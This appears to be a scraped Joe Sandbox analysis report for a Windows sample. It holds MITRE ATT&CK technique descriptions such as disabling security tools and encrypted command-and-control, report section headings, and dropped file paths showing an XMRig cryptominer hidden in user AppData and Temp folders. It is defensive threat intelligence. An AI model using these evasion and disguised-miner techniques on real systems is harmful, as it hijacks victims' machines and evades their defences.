Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report pTVKHqys2h.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Bitcoin Miner

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Bitcoin Miner

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\System32\config.exe

C:\Users\user\AppData\Local\System32\config.exe:Zone.Identifier

C:\Users\user\AppData\Local\Temp\System\process.exe (copy)

C:\Users\user\AppData\Local\Temp\System\temp.zip

C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\SHA256SUMS

C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\WinRing0x64.sys

C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\benchmark_10M.cmd

C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\benchmark_1M.cmd

C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\config.json

C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\pool_mine_example.cmd

C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\rtm_ghostrider_example.cmd

C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\solo_mine_example.cmd

C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\start.cmd

C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe

Windows Analysis Report
pTVKHqys2h.exe